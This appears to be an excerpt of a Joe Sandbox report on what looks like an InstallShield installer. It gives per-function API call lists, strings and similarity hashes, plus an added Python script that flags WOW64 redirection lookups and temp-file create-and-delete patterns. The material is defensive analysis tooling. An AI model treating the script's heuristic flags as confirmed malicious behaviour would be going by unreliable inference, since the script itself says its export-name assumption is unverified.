• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: Palette$Create$EntriesGlobalObjectSystem$AllocColorCompatibleDeleteH_prolog3_HalftoneLockReleaseSelectTable
• String ID:
• API String ID: 447354755-0
• Opcode ID: a111f4ed5d38e5bca96b9457fea99d3e5bb589bb35b783ca3674186b054c1343
• Instruction ID: 849773926da403f97f1caf2d359c7c4e59e6385afba593153f2c4442404c29fc
• Opcode Fuzzy Hash: a111f4ed5d38e5bca96b9457fea99d3e5bb589bb35b783ca3674186b054c1343
• Instruction Fuzzy Hash: 42415BB15002889FC710DF609C48AE97F79EF59304F1580F9FA4DA7292D6354A86CF6D
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32 ref: 004052BF
• SetLastError.KERNEL32(HsG), ref: 004052F3
  • Part of subcall function 00405B10: MultiByteToWideChar.KERNEL32(00000007,00000000,00000000,00000001,00000000,00000000,CC858012,00000000,0000000B,?), ref: 00405CA0
  • Part of subcall function 00405B10: MultiByteToWideChar.KERNEL32(00000007,00000000,?), ref: 00405CDA
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00471344,000000FF), ref: 00405322
• SetLastError.KERNEL32(?,?,00000000,000000FF), ref: 0040536E
• GetLastError.KERNEL32 ref: 00405381
• SysFreeString.OLEAUT32(?), ref: 0040539B
• SysFreeString.OLEAUT32(?), ref: 004053A8
• SetLastError.KERNEL32(?), ref: 004053CC
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$ByteCharFreeMultiStringWide
• String ID: HsG$HsG$HsG$m<H
• API String ID: 2284902721-1568047563
• Opcode ID: 4abcf6c6b92f3abe56b14e23d28952b3a7d80fad0133c9d5b39ab4039d398ab0
• Instruction ID: 5db28ef6be46b99bb38aed72c803002c3cb564db236bb73f6af1ef404ea211e9
• Opcode Fuzzy Hash: 4abcf6c6b92f3abe56b14e23d28952b3a7d80fad0133c9d5b39ab4039d398ab0
• Instruction Fuzzy Hash: 524106B15083409FD700DF69C988B4ABBE4FF88318F51496EF8589B261D775E804CF86
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004594FD: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,0043FD91,000000BC,00420FE2,?,0047C4E4,00000000,?,?,?,?,0000000C), ref: 00459510
  • Part of subcall function 004594FD: GetProcAddress.KERNEL32(00000000), ref: 00459517
  • Part of subcall function 004594FD: GetCurrentProcess.KERNEL32(00000000,?,?,0043FD91,000000BC,00420FE2,?,0047C4E4,00000000,?,?,?,?,0000000C,0000000C,?), ref: 00459527
• GetModuleHandleW.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,00000000,?,00000000,?,?,004283B1,00000001), ref: 00459420
• GetProcAddress.KERNEL32(00000000), ref: 00459429
• GetModuleHandleW.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,?,?,004283B1,00000001), ref: 00459434
• GetProcAddress.KERNEL32(00000000), ref: 00459437
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: AddressHandleModuleProc$CurrentProcess
• String ID: Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32$pgJ$pgJ
• API String ID: 565683799-3440938694
• Opcode ID: e8a31edd9813ddd4de7970e7a50d52740b16cecb3a1409188b32aaebed054360
• Instruction ID: 27163716600c6c25b8d2def2750d3a6a8d7fbba046c48fa91ec0526090da6370
• Opcode Fuzzy Hash: e8a31edd9813ddd4de7970e7a50d52740b16cecb3a1409188b32aaebed054360
• Instruction Fuzzy Hash: B11123A0604205FBCB10ABB69C40B6E3B9DEB4A706B14443BE809D3252DB7DCD0A9B18
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_catch_GS.LIBCMT ref: 00424208
  • Part of subcall function 00428C18: __EH_prolog3_GS.LIBCMT ref: 00428C22
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
• GetTempPathW.KERNEL32(00000104,00000000,?,00000104,00000001,00000000,00000104,ISSetup.dll,?,00000001,?,00000001,00000000,?,?,?), ref: 00424505
• GetTempFileNameW.KERNEL32(?,iss,00000000,00000000,?,00000104), ref: 0042454F
• DeleteFileW.KERNEL32(?,?,00000128,00427A1B), ref: 0042459D
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorFileFreeLastStringTemp$DeleteH_prolog3_H_prolog3_catch_NamePath
• String ID: Error opening MSI database: %d$Failed to execute query on Binary table, error: %d$Failed to query Binary table, error: %d$ISSetup.dll$SELECT * FROM `Binary`$iss$msiaction.cpp
• API String ID: 1463199135-2722078864
• Opcode ID: 5d06bd1b21dfdee6b8f320fa7fd9a6eeb4c50ec6d097f3f810b08b6ee8c24971
• Instruction ID: c334feb578a811e1845453ea508cfe2e1e8db8aae0ebfe18aa7265d2c6d294f3
• Opcode Fuzzy Hash: 5d06bd1b21dfdee6b8f320fa7fd9a6eeb4c50ec6d097f3f810b08b6ee8c24971
• Instruction Fuzzy Hash: 56C184309001A8EEDB21DB61CD45BDDB7B4AF11308F5480EAE549B7191DBB81F88DF69
Uniqueness
Uniqueness Score: -1.00%
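Added example, not part of the Joe Sandbox report and not code from the analysed sample: a small Python triage script that parses API reference lines in the format used by the listings above and surfaces two behaviours visible in them, the GetModuleHandleW/GetProcAddress lookup of the Wow64*Wow64FsRedirection exports (the record two entries up) and a temporary file created with GetTempFileNameW and removed again with DeleteFileW inside the same function (the record directly above). The sample input is copied from those two listings; the rule set, every function name, and the assumption that the first identifier following the module name in the printed stack slots is the export about to be passed to GetProcAddress are this example's own.

```python
import re

# Joe Sandbox prints one API reference per line, in one of these shapes:
#   • Name.MODULE(arg1,arg2,...), ref: 0040XXXX
#   • Name.MODULE ref: 0040XXXX
#   • Part of subcall function 0040YYYY: Name.MODULE(...), ref: 0040ZZZZ
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[~\w]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX8 = re.compile(r"[0-9A-Fa-f]{8}")
IDENT = re.compile(r"[A-Za-z_]\w+")

# Exports whose dynamic lookup is worth surfacing: toggling WOW64 file-system
# redirection lets a 32-bit process reach the real System32 on 64-bit Windows.
# The rule set is an assumption of this example, not something the report states.
WOW64_REDIRECTION = {
    "Wow64DisableWow64FsRedirection",
    "Wow64RevertWow64FsRedirection",
    "Wow64EnableWow64FsRedirection",
}

# Sample input: lines copied from the two listings above; the section headings
# are included to show the parser skips them.
SAMPLE_LISTING = """\
APIs
• GetLastError.KERNEL32 ref: 004052BF
  • Part of subcall function 004594FD: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,0043FD91,000000BC,00420FE2,?,0047C4E4,00000000,?,?,?,?,0000000C), ref: 00459510
  • Part of subcall function 004594FD: GetProcAddress.KERNEL32(00000000), ref: 00459517
  • Part of subcall function 004594FD: GetCurrentProcess.KERNEL32(00000000,?,?,0043FD91,000000BC,00420FE2,?,0047C4E4,00000000,?,?,?,?,0000000C,0000000C,?), ref: 00459527
• GetModuleHandleW.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,00000000,?,00000000,?,?,004283B1,00000001), ref: 00459420
• GetProcAddress.KERNEL32(00000000), ref: 00459429
• GetModuleHandleW.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,?,?,004283B1,00000001), ref: 00459434
• GetProcAddress.KERNEL32(00000000), ref: 00459437
• GetTempPathW.KERNEL32(00000104,00000000,?,00000104,00000001,00000000,00000104,ISSetup.dll,?,00000001,?,00000001,00000000,?,?,?), ref: 00424505
• GetTempFileNameW.KERNEL32(?,iss,00000000,00000000,?,00000104), ref: 0042454F
• DeleteFileW.KERNEL32(?,?,00000128,00427A1B), ref: 0042459D
Strings
"""


def parse_api_lines(text):
    """Return one dict per API reference line; headings, blanks and other text are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        calls.append({
            "api": m.group("api"),
            "module": m.group("mod").upper(),
            "args": [a.strip() for a in raw.split(",")] if raw else [],
            "ref": m.group("ref"),
            "sub": m.group("sub"),  # address of the sub-call's function, or None
        })
    return calls


def resolved_exports(calls):
    """Map export name -> (module, ref) for each GetModuleHandle/LoadLibrary call that is
    immediately followed by GetProcAddress in the same function body.

    The report prints the stack slots as they are at call time, so the module string
    comes first and the next identifier is the export name GetProcAddress will look up
    (an assumption of this example)."""
    found = {}
    for cur, nxt in zip(calls, calls[1:]):
        if cur["api"] not in ("GetModuleHandleW", "GetModuleHandleA", "LoadLibraryW", "LoadLibraryA"):
            continue
        if nxt["api"] != "GetProcAddress" or nxt["sub"] != cur["sub"]:
            continue
        if not cur["args"]:
            continue
        module = cur["args"][0]
        idents = [a for a in cur["args"][1:] if IDENT.fullmatch(a) and not HEX8.fullmatch(a)]
        if idents:
            found[idents[0]] = (module, cur["ref"])
    return found


def triage(text):
    """Parse a listing and return (calls, findings) where findings is a list of strings."""
    calls = parse_api_lines(text)
    findings = []
    for name, (module, ref) in resolved_exports(calls).items():
        findings.append(f"dynamic resolution of {module}!{name} at {ref}")
        if name in WOW64_REDIRECTION:
            findings.append(f"WOW64 file-system redirection toggled via {name} at {ref}")
    # Drop-and-delete: GetTempFileNameW followed by DeleteFileW in the function's own body
    # (sub-call lines belong to other functions and are not paired here).
    temp_ref = None
    for c in calls:
        if c["sub"]:
            continue
        if c["api"] == "GetTempFileNameW":
            temp_ref = c["ref"]
        elif c["api"] == "DeleteFileW" and temp_ref:
            findings.append(f"temp file created at {temp_ref} and deleted at {c['ref']}")
            temp_ref = None
    return calls, findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LISTING)[1]:
        print(finding)
```

The regex accepts both the `Name.MODULE(args), ref:` form and the argument-less `Name.MODULE ref:` form, and sub-call lines keep their parent function address so that a GetModuleHandleW/GetProcAddress pair is only matched within one function body. A pair flagged on a WOW64 redirection export is a useful pivot back into the disassembly, but the resolved name is taken from printed stack contents, so confirm it against the actual argument passed to GetProcAddress before treating it as a fact.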

APIs
• __EH_prolog3_GS.LIBCMT ref: 0043745C
  • Part of subcall function 0042FDE6: __EH_prolog3.LIBCMT ref: 0042FDED
  • Part of subcall function 0042FE5D: GetVersionExW.KERNEL32(?,?,?), ref: 0042FE9A
  • Part of subcall function 0042FE5D: GetSystemInfo.KERNEL32(?,?,?), ref: 0042FEEC
  • Part of subcall function 004113B6: __EH_prolog3.LIBCMT ref: 004113BD
  • Part of subcall function 004119C2: __EH_prolog3_GS.LIBCMT ref: 004119CC
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 0043773E
  • Part of subcall function 004352C7: __EH_prolog3_catch.LIBCMT ref: 004352CE
  • Part of subcall function 004352C7: lstrcmpW.KERNEL32(00000008,00483E18,?,?,00483E18,00000008,?,00000004,004374EE,Startup,Source,00000001,?,00000400,00000452), ref: 004352F6
  • Part of subcall function 00435380: __EH_prolog3_GS.LIBCMT ref: 0043538A
• ~_Task_impl.LIBCPMT ref: 004377D6
• ~_Task_impl.LIBCPMT ref: 004377E9
  • Part of subcall function 0042E6A2: __EH_prolog3_GS.LIBCMT ref: 0042E6AC
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog3_$H_prolog3Task_impl$H_prolog3_catchInfoSystemVersionlstrcmplstrlen
• String ID: BetaMarker.dat$EvalMarker.dat$KEY$PASSWORD$Source$Startup$|LJ
• API String ID: 4055012072-2629155533
• Opcode ID: 80cdcfcf953ca3afb0a49e1b15994a542e119affbe420d5d09d8ff1ad770c1cb
                                                                                                                                                                          • Instruction ID: 058473923310ad608baa25f56d86c1c014b6a368f64ae89df39ae6a118ea4fda
                                                                                                                                                                          • Opcode Fuzzy Hash: 80cdcfcf953ca3afb0a49e1b15994a542e119affbe420d5d09d8ff1ad770c1cb
                                                                                                                                                                          • Instruction Fuzzy Hash: AF91F6B0A0A615AAEB25E771CC51BFEB7A4AF05304F0441EFE449A3193DB385E44CB58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00456F96
• AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0000014C,0043B872,?), ref: 00456FF8
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00457033
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000221,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00457053
• _memset.LIBCMT ref: 00457063
• SetEntriesInAclW.ADVAPI32 ref: 004570FC
• InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00457130
  • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: Initialize$Allocate$DescriptorEntriesH_prolog3H_prolog3_Security_memset
• String ID: HsG$HsG
• API String ID: 2208176779-815662401
• Opcode ID: 29fdd669347f08925f8a05906393d594b474ebb10eaf96851ff8d35676633cf9
• Instruction ID: 4a8fc01e01686fedfbbd6b6c0db099c278e90a9120d71ec210ee663dde4e012f
• Opcode Fuzzy Hash: 29fdd669347f08925f8a05906393d594b474ebb10eaf96851ff8d35676633cf9
• Instruction Fuzzy Hash: C39144B1D00259AADB20DF55CC81BEEB7B8BF54304F4044EEE509B6292EB745B88CF59
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00422473
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 00436EFC: _memset.LIBCMT ref: 00436F28
  • Part of subcall function 00422751: __EH_prolog3_catch_GS.LIBCMT ref: 0042275B
  • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
  • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
  • Part of subcall function 00436124: __EH_prolog3_GS.LIBCMT ref: 0043612B
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
• _memset.LIBCMT ref: 0042257E
• _memset.LIBCMT ref: 00422599
  • Part of subcall function 00440126: lstrcpyW.KERNEL32 ref: 00440164
  • Part of subcall function 00440126: lstrcpyW.KERNEL32 ref: 0044016C
  • Part of subcall function 00440126: _malloc.LIBCMT ref: 00440186
  • Part of subcall function 00440126: _memset.LIBCMT ref: 00440197
  • Part of subcall function 00440126: _memset.LIBCMT ref: 004401C2
  • Part of subcall function 00440126: wsprintfW.USER32 ref: 00440214
  • Part of subcall function 00440126: _memset.LIBCMT ref: 0044022C
  • Part of subcall function 00440CE4: lstrcpyW.KERNEL32 ref: 00440D1D
  • Part of subcall function 00440CE4: lstrcpyW.KERNEL32 ref: 00440D27
  • Part of subcall function 00440CE4: _swscanf.LIBCMT ref: 00440D9C
  • Part of subcall function 00440CE4: _swscanf.LIBCMT ref: 00440DC5
• __wfullpath.LIBCMT ref: 004226EC
  • Part of subcall function 0043FBF3: __EH_prolog3_GS.LIBCMT ref: 0043FBFD
  • Part of subcall function 0043FBF3: wsprintfW.USER32 ref: 0043FC3F
  • Part of subcall function 0043FBF3: wvsprintfW.USER32(?,?,00000000), ref: 0043FC5A
Strings
• ScriptDriven, xrefs: 004224FC
• Startup, xrefs: 00422519
• HsG, xrefs: 004224A1
• 4.05.0.0, xrefs: 004225B7
• Windows Installer 4.5 or newer is required to run this installation but is not present on the machine. Setup will now exit., xrefs: 00422619
• msiaction.cpp, xrefs: 004225FC
• Msi.DLL, xrefs: 004225A9
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast_memset$lstrcpy$H_prolog3_$FreeString_swscanfwsprintf$H_prolog3_catch___wfullpath_mallocwvsprintf
• String ID: 4.05.0.0$HsG$Msi.DLL$ScriptDriven$Startup$Windows Installer 4.5 or newer is required to run this installation but is not present on the machine. Setup will now exit.$msiaction.cpp
• API String ID: 566702958-3432014048
• Opcode ID: fcde2ecf36e626801b94e16a626954dea1268674b33742f80287f6dfbd65f663
• Instruction ID: e1a2aad2503cfae28dd439aa769bfc125dd6cf0a037798f186362dfce8e74fae
• Opcode Fuzzy Hash: fcde2ecf36e626801b94e16a626954dea1268674b33742f80287f6dfbd65f663
• Instruction Fuzzy Hash: E871C371A01168AAEF20D760CD95FEEB778AB44308F4041EBE509B61C1DFB85B89CF59
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
• Software\Microsoft\Windows\CurrentVersion\Installer, xrefs: 00426B08
• Startup, xrefs: 00426918
• DotNetDelayReboot, xrefs: 004268FB
• System is Win9x or reboot is not being suppressed, reboot will be immediate, xrefs: 00426A8E
• msiaction.cpp, xrefs: 00426983, 004269DB, 00426A6E
• InstallerLocation, xrefs: 00426B4B
• Redist return value (%d) indicates a reboot is required, DotNetDelayReboot is %x, xrefs: 0042697D
• Reboot will be deferred, xrefs: 004269FB
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: CurrentDirectoryH_prolog3__memset
• String ID: DotNetDelayReboot$InstallerLocation$Reboot will be deferred$Redist return value (%d) indicates a reboot is required, DotNetDelayReboot is %x$Software\Microsoft\Windows\CurrentVersion\Installer$Startup$System is Win9x or reboot is not being suppressed, reboot will be immediate$msiaction.cpp
• API String ID: 277675003-2561541245
• Opcode ID: dfd16fa2cd39d483b21b1d9c7cdb9ccfd438fe874de06ac59044d39ddfe285eb
• Instruction ID: f2c2c43573c966db099732116d9ce63b58c9502003dbe7f4726a2a704f6d60ff
• Opcode Fuzzy Hash: dfd16fa2cd39d483b21b1d9c7cdb9ccfd438fe874de06ac59044d39ddfe285eb
• Instruction Fuzzy Hash: 3E817070901228AEEF64EB60CC89BDD7774AB14304F5041EAE50DB61E1DBB85FC9CB59
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0043FD64
                                                                                                                                                                            • Part of subcall function 004594FD: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,0043FD91,000000BC,00420FE2,?,0047C4E4,00000000,?,?,?,?,0000000C), ref: 00459510
                                                                                                                                                                            • Part of subcall function 004594FD: GetProcAddress.KERNEL32(00000000), ref: 00459517
                                                                                                                                                                            • Part of subcall function 004594FD: GetCurrentProcess.KERNEL32(00000000,?,?,0043FD91,000000BC,00420FE2,?,0047C4E4,00000000,?,?,?,?,0000000C,0000000C,?), ref: 00459527
                                                                                                                                                                          • CreateFileW.KERNEL32(00000015,80000000,00000001,00000000,00000003,00000080,00000000,000000BC,00420FE2,?,0047C4E4,00000000,?,?,?,?), ref: 0043FDBF
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 0043FDFF
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0043FE06
                                                                                                                                                                            • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressErrorFreeHandleLastModuleProcString$CreateCurrentFileH_prolog3H_prolog3_Process
                                                                                                                                                                          • String ID: Corrected file path: new path is '%s' (was this on localappdata in system context? old: '%s')$GetFinalPathNameByHandleW$HsG$HsG$\\?\$kernel32.dll$utils.cpp
                                                                                                                                                                          • API String ID: 2316756493-59786746
                                                                                                                                                                          • Opcode ID: 28c5848bd6dcf686af964ccd665d3da7da6b158d9a02d32b8071fae2b27b2dbb
                                                                                                                                                                          • Instruction ID: f137a8aa17e39c14183c5b1b06e9384378b43606c9e0dba753352061d6d4e362
                                                                                                                                                                          • Opcode Fuzzy Hash: 28c5848bd6dcf686af964ccd665d3da7da6b158d9a02d32b8071fae2b27b2dbb
                                                                                                                                                                          • Instruction Fuzzy Hash: 7B716E70E04318EEDB20DB64CC95BDEB7B8AF05308F1040AEE449B7191DB785A89CF5A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0043EB90
                                                                                                                                                                          • _memset.LIBCMT ref: 0043EBC3
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,00000104), ref: 0043EBDD
                                                                                                                                                                            • Part of subcall function 0043D68F: __EH_prolog3_GS.LIBCMT ref: 0043D696
                                                                                                                                                                            • Part of subcall function 0043D68F: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0043D743
                                                                                                                                                                            • Part of subcall function 0043D68F: GetLastError.KERNEL32 ref: 0043D751
                                                                                                                                                                          • _memset.LIBCMT ref: 0043EC0A
                                                                                                                                                                            • Part of subcall function 0043F956: __EH_prolog3_GS.LIBCMT ref: 0043F95D
                                                                                                                                                                          • _memset.LIBCMT ref: 0043EC55
                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,?), ref: 0043EC69
                                                                                                                                                                          • GetTempFileNameW.KERNEL32(?,0047D474,00000000,?,?,?,?,?,?,?,?,?), ref: 0043EC83
                                                                                                                                                                            • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
                                                                                                                                                                            • Part of subcall function 00414B0D: __EH_prolog3.LIBCMT ref: 00414B14
